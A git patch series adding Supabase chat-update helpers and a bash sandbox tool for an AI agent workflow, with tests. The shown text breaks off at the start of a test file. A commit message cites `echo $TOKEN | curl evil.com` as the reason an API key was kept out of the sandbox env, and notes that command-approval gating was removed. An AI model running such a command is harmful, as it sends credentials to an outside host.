+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the
+ *     existing `id` conflict was silently ignored.
+ *   - `{ ok: false, error }` — Supabase failure. Visible to logs so transient
+ *     DB problems aren't masked as duplicates.
+ */
+export type UpsertChatMessageResult =
+  | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Insert-or-skip a single chat message row. Wraps Supabase upsert with
+ * `ignoreDuplicates: true` on the `id` primary key, but returns a
+ * discriminated result so callers can tell "duplicate skipped" apart from
+ * "DB error" — the previous helper returned `null` for both, which made
+ * callers silently swallow operational failures.
+ */
+export async function upsertChatMessage(
+  data: TablesInsert<"chat_messages">,
+): Promise<UpsertChatMessageResult> {
+  const { data: row, error } = await supabase
+    .from("chat_messages")
+    .upsert(data, { onConflict: "id", ignoreDuplicates: true })
+    .select()
+    .maybeSingle();
+
+  if (error) {
+    console.error("[upsertChatMessage] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return { ok: true, row, isDuplicate: row === null };
+}
diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts
new file mode 100644
index 000000000..a0edc247b
--- /dev/null
+++ b/lib/supabase/chats/__tests__/updateChat.test.ts
@@ -0,0 +1,110 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+const updateChain = vi.fn();
+const eqChain = vi.fn();
+const matchChain = vi.fn();
+const isChain = vi.fn();
+const selectChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ update: updateChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Fluent builder mock — every method returns the same builder so we can
+  // chain .eq / .match / .is / .select in any order without per-step setup.
+  const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain };
+  updateChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  matchChain.mockReturnValue(builder);
+  isChain.mockReturnValue(builder);
+});
+
+describe("updateChat", () => {
+  describe("plain update (no where predicate)", () => {
+    it("returns ok:true with rowsUpdated and the row on success", async () => {
+      const row = { id: "chat-1", title: "renamed" };
+      selectChain.mockResolvedValue({ data: [row], error: null });
+      const result = await updateChat({ id: "chat-1" }, { title: "renamed" });
+      expect(result.ok).toBe(true);
+      if (!result.ok) return;
+      expect(result.rowsUpdated).toBe(1);
+      expect(result.row).toEqual(row);
+      expect(updateChain).toHaveBeenCalledWith({ title: "renamed" });
+      expect(eqChain).toHaveBeenCalledWith("id", "chat-1");
+      // With no where filter, match is called with an empty object.
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("returns ok:false with error on Supabase failure", async () => {
+      selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+      const result = await updateChat({ id: "chat-x" }, { title: "x" });
+      expect(result.ok).toBe(false);
+      if (result.ok) return;
+      expect(result.error).toBe("down");
+    });
+  });
+
+  describe("generic where predicate", () => {
+    it("emits `is null` for null values (e.g. CAS expecting unset)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      // No non-null fields → match called with empty {}
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: "wrun_old" } },
+        { active_stream_id: "wrun_new" },
+      );
+      expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" });
+      // No null fields → is() not called
+      expect(isChain).not.toHaveBeenCalled();
+    });
+
+    it("AND-s nullable + equality where columns together", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } },
+        { title: "x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" });
+    });
+
+    it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => {
+      selectChain.mockResolvedValue({ data: [], error: null });
+      const result = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+    });
+
+    it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => {
+      selectChain.mockResolvedValueOnce({ data: [], error: null });
+      const raceLost = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+
+      selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } });
+      const dbError = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" }));
+    });
+  });
+});
diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts
new file mode 100644
index 000000000..63cd2064b
--- /dev/null
+++ b/lib/supabase/chats/updateChat.ts
@@ -0,0 +1,86 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesUpdate } from "@/types/database.types";
+
+/**
+ * Subset of `chats` columns that callers are permitted to mutate via this
+ * helper. Explicitly excludes structural fields (`id`, `session_id`,
+ * `created_at`) so generic updates cannot bypass chat invariants.
+ */
+export type ChatMutableFields = Pick<
+  TablesUpdate<"chats">,
+  "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at"
+>;
+
+/**
+ * Filter accepted by {@link updateChat}. Always matches by `id`. Optional
+ * `where` adds AND-ed predicates per column — generic across columns so
+ * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their
+ * own wrapper helpers rather than baking into the Supabase plumbing.
+ *
+ * Each `where` entry maps to `column = value` (or `column IS NULL` when
+ * `value === null`).
+ */
+export type UpdateChatFilter = {
+  id: string;
+  where?: Partial<Tables<"chats">>;
+};
+
+/**
+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, rowsUpdated: 1 }` — updated as intended.
+ *   - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS
+ *     race lost, or `id` not found).
+ *   - `{ ok: false, error }` — Supabase / network failure.
+ */
+export type UpdateChatResult =
+  | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null }
+  | { ok: false; error: string };
+
+/**
+ * Updates a `chats` row by id, optionally constrained by a generic `where`
+ * predicate. Returns a discriminated result so callers can tell
+ * "predicate didn't match" (a race lost) from "Supabase failure" (operational
+ * issue) — the previous behavior of returning `false` for both was a CAS bug.
+ */
+export async function updateChat(
+  filter: UpdateChatFilter,
+  updates: ChatMutableFields,
+): Promise<UpdateChatResult> {
+  // Split the optional `where` map into nullable vs equality predicates so we
+  // can apply each as a single chained call (`.match()` for equalities,
+  // `.is(col, null)` per nullable). Iterating with `let query = ...` and
+  // reassigning in a for-loop confuses Supabase's deeply generic builder
+  // types ("type instantiation is excessively deep") in the Next.js build.
+  const entries = Object.entries(filter.where ?? {});
+  const equalityMatches: Record<string, unknown> = {};
+  const nullColumns: string[] = [];
+  for (const [column, value] of entries) {
+    if (value === null) {
+      nullColumns.push(column);
+    } else {
+      equalityMatches[column] = value;
+    }
+  }
+
+  const baseQuery = supabase
+    .from("chats")
+    .update(updates)
+    .eq("id", filter.id)
+    .match(equalityMatches);
+  const finalQuery = nullColumns.reduce<typeof baseQuery>(
+    (q, column) => q.is(column, null) as typeof baseQuery,
+    baseQuery,
+  );
+
+  const { data, error } = await finalQuery.select();
+  if (error) {
+    console.error("[updateChat] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return {
+    ok: true,
+    rowsUpdated: data?.length ?? 0,
+    row: data?.[0] ?? null,
+  };
+}

From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:12:07 -0500
Subject: [PATCH 03/10] feat(chat-workflow): port bash sandbox tool + wire
 experimental_context (PR 4, slim) (#583)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  34 ++--
 app/lib/workflows/runAgentWorkflow.ts         |  32 ++--
 lib/agent/__tests__/buildAgentTools.test.ts   |  17 ++
 lib/agent/buildAgentTools.ts                  |  20 +++
 lib/agent/tools/AgentContext.ts               |  34 ++++
 lib/agent/tools/__tests__/bashTool.test.ts    | 158 ++++++++++++++++++
 .../__tests__/buildRecoupExecEnv.test.ts      |  31 ++++
 lib/agent/tools/__tests__/getSandbox.test.ts  |  39 +++++
 .../tools/__tests__/isAgentContext.test.ts    |  42 +++++
 lib/agent/tools/bashTool.ts                   | 116 +++++++++++++
 lib/agent/tools/buildRecoupExecEnv.ts         |  30 ++++
 lib/agent/tools/getSandbox.ts                 |  28 ++++
 lib/agent/tools/isAgentContext.ts             |  26 +++
 lib/agents/generalAgent/getGeneralAgent.ts    |   5 +-
 lib/chat/const.ts                             |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  20 +++
 16 files changed, 615 insertions(+), 30 deletions(-)
 create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts
 create mode 100644 lib/agent/buildAgentTools.ts
 create mode 100644 lib/agent/tools/AgentContext.ts
 create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
 create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts
 create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts
 create mode 100644 lib/agent/tools/bashTool.ts
 create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts
 create mode 100644 lib/agent/tools/getSandbox.ts
 create mode 100644 lib/agent/tools/isAgentContext.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 352dcd265..f9a894195 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,27 +1,36 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so each tool's
+   * `execute` callback can read the sandbox state + per-prompt context.
+   */
+  agentContext: AgentContext;
 };
 
 /**
- * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
- * `"use step"` so that:
+ * One LLM turn (with internal tool-call iteration) in the chat workflow.
+ * Runs as a Vercel Workflow `"use step"` so:
  *
  *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
  *   - The result is cached as a single durable event — replays after a crash
- *     do not re-bill the model.
+ *     do not re-bill the model or re-execute tools.
  *
- * Currently emits a plain text response with no tools. Sandbox tools land in
- * the follow-up PR (port `@open-harness/agent` tools + wire via
- * `experimental_context`).
+ * `streamText` drives the tool-call → tool-result → next-LLM-call loop
+ * internally using its default stop condition. Our outer workflow stays
+ * single-turn for now — multi-turn message threading lands when the rest
+ * of the tool surface ports in a follow-up PR.
  *
- * @param input - Messages + selected model + the workflow's writable stream.
- * @returns finishReason from the model run (for the workflow loop's break condition).
+ * @param input - Messages + selected model + writable stream + agent context.
+ * @returns finishReason from the model run.
  */
 export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
   "use step";
@@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   console.log("[runAgentStep] start", {
     modelId: input.modelId,
     messageCount: input.messages.length,
+    hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
   const modelMessages = convertToModelMessages(input.messages);
+  const tools = buildAgentTools();
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
     messages: modelMessages,
+    tools,
+    stopWhen: CHAT_AGENT_STOP_WHEN,
+    experimental_context: input.agentContext,
   });
 
-  // Acquire the writer once and release in `finally` — re-acquiring per chunk
-  // (the previous shape) leaked the lock when any write threw.
+  // Acquire the writer once and release in `finally` so a thrown chunk
+  // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
     for await (const part of result.toUIMessageStream()) {
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index db679145a..ce65b0bb3 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,12 +1,18 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
   chatId: string;
   sessionId: string;
   modelId: string;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
+   * can read sandbox state + per-prompt Recoup creds.
+   */
+  agentContext: AgentContext;
 };
 
 /**
@@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = {
  * client; this function writes UIMessage chunks into the workflow's writable
  * via `runAgentStep`.
  *
- * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
- * unsafe today: each iteration would re-send the original prompt without
- * the assistant's tool-call response in scope, so a `tool-calls` finish
- * reason would loop forever on the same input. The proper multi-turn
- * shape (where the step appends its response to `messages` before the
- * next iteration) lands with the sandbox-tool port in PR 4.
- *
- * Until then, if the model returns `tool-calls` we log a warning and exit
- * — the client receives the partial tool-call chunks but no follow-up turn.
+ * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (up to
+ * MAX_TOOL_STEPS) happens INSIDE `streamText` via `stopWhen` — so the
+ * single workflow turn covers the full "user → assistant → tool → tool
+ * result → assistant" cycle without our outer loop having to thread
+ * messages between iterations.
  *
  * WDK constraints honored:
- *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions.
  *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
  */
 export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
@@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<vo
     messages: input.messages,
     modelId: input.modelId,
     writable,
+    agentContext: input.agentContext,
   });
 
-  if (result.finishReason === "tool-calls") {
-    console.warn(
-      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
-      { chatId: input.chatId },
-    );
-  } else {
-    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
-  }
+  console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
 }
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
new file mode 100644
index 000000000..52479cad0
--- /dev/null
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -0,0 +1,17 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+
+describe("buildAgentTools", () => {
+  it("returns a tools record keyed by tool name", () => {
+    const tools = buildAgentTools();
+    expect(tools).toHaveProperty("bash");
+    expect(typeof tools.bash).toBe("object");
+  });
+
+  it("each tool has an inputSchema, description, and execute", () => {
+    const tools = buildAgentTools();
+    expect(tools.bash.inputSchema).toBeDefined();
+    expect(tools.bash.description).toBeDefined();
+    expect(typeof tools.bash.execute).toBe("function");
+  });
+});
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
new file mode 100644
index 000000000..be6bde085
--- /dev/null
+++ b/lib/agent/buildAgentTools.ts
@@ -0,0 +1,20 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+
+/**
+ * Factory for the full agent tool set passed into `streamText({ tools })`.
+ * Each tool reads its sandbox handle + recoup creds from `experimental_context`
+ * at execute time — the factory takes no arguments because the tools are
+ * stateless modulo that context.
+ *
+ * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
+ * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
+ * `fetch`) port in follow-up PRs and slot into this record one-by-one
+ * without changing the factory signature.
+ */
+export function buildAgentTools() {
+  return {
+    bash: bashTool(),
+  };
+}
+
+export type AgentTools = ReturnType<typeof buildAgentTools>;
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
new file mode 100644
index 000000000..63d2a1b7e
--- /dev/null
+++ b/lib/agent/tools/AgentContext.ts
@@ -0,0 +1,34 @@
+import type { VercelState } from "@/lib/sandbox/vercel/state";
+
+/**
+ * Per-tool-call context threaded into the agent via `streamText`'s
+ * `experimental_context`. Mirrors the open-agents `AgentContext` shape
+ * (subset — slim PR 4 ports only the `bash` tool, so context only needs
+ * what `bash` reads).
+ *
+ * Why no `recoupAccessToken` field? A short-lived per-prompt credential
+ * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
+ * back to recoup-api as the caller. We deliberately omit it here — the
+ * legacy api-key path is too long-lived to expose inside a sandbox where
+ * model-issued bash commands can read env. Proper short-lived token
+ * minting lands alongside the `skill` tool port.
+ */
+export type AgentContext = {
+  /**
+   * Persistable sandbox state. Tools reconnect via `connectVercel(state)` —
+   * we never pass a live `Sandbox` instance through context because
+   * workflow durability requires replay-friendly inputs.
+   */
+  sandbox: {
+    state: VercelState;
+    workingDirectory: string;
+    currentBranch?: string;
+  };
+  /**
+   * Organization UUID when the sandbox was opened against a recoupable
+   * org repo (`org-<slug>-<uuid>`). Forwarded to sandboxed commands as
+   * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org.
+   * Public information — no security risk in exposing.
+   */
+  recoupOrgId?: string;
+};
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
new file mode 100644
index 000000000..da9a999d3
--- /dev/null
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseContext = {
+  sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(overrides: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    exec: vi.fn(),
+    execDetached: vi.fn(),
+    ...overrides,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("bashTool.execute", () => {
+  it("executes a command via sandbox.exec in the sandbox's working directory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "README.md\npackage.json",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = await tool.execute!({ command: "ls" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(result).toEqual({
+      success: true,
+      exitCode: 0,
+      stdout: "README.md\npackage.json",
+      stderr: "",
+    });
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "lots of output",
+        stderr: "",
+        truncated: true,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "find ." }, {
+      experimental_context: baseContext,
+    } as never)) as { truncated?: boolean };
+    expect(result.truncated).toBe(true);
+  });
+
+  it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "ls", cwd: "apps/web" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono/apps/web",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("injects RECOUP_ORG_ID into the exec env when present in context", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "curl example.com" }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record<string, string> };
+    expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("returns the detached commandId when called with detached:true", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stdout: string };
+    expect(result.success).toBe(true);
+    expect(result.stdout).toMatch(/cmd-123/);
+    expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono");
+  });
+
+  it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => {
+    const sandbox = makeSandbox({ execDetached: undefined });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stderr: string };
+    expect(result.success).toBe(false);
+    expect(result.stderr).toMatch(/detached mode is not supported/i);
+  });
+
+  it("does NOT inject env vars on detached execs", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    // execDetached signature is (command, cwd) — no env arg.
+    expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2);
+  });
+});
diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
new file mode 100644
index 000000000..3422fd662
--- /dev/null
+++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+
+const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" };
+
+describe("buildRecoupExecEnv", () => {
+  it("returns undefined when no context", () => {
+    expect(buildRecoupExecEnv(undefined)).toBeUndefined();
+    expect(buildRecoupExecEnv(null)).toBeUndefined();
+    expect(buildRecoupExecEnv("not-a-context")).toBeUndefined();
+  });
+
+  it("returns undefined when context has no recoupOrgId", () => {
+    expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined();
+  });
+
+  it("injects RECOUP_ORG_ID when present in context", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" });
+    expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("ignores empty-string recoupOrgId", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" });
+    expect(env).toBeUndefined();
+  });
+
+  it("returns undefined when the input is not a valid AgentContext shape", () => {
+    expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined();
+    expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined();
+  });
+});
diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts
new file mode 100644
index 000000000..a14122f81
--- /dev/null
+++ b/lib/agent/tools/__tests__/getSandbox.test.ts
@@ -0,0 +1,39 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
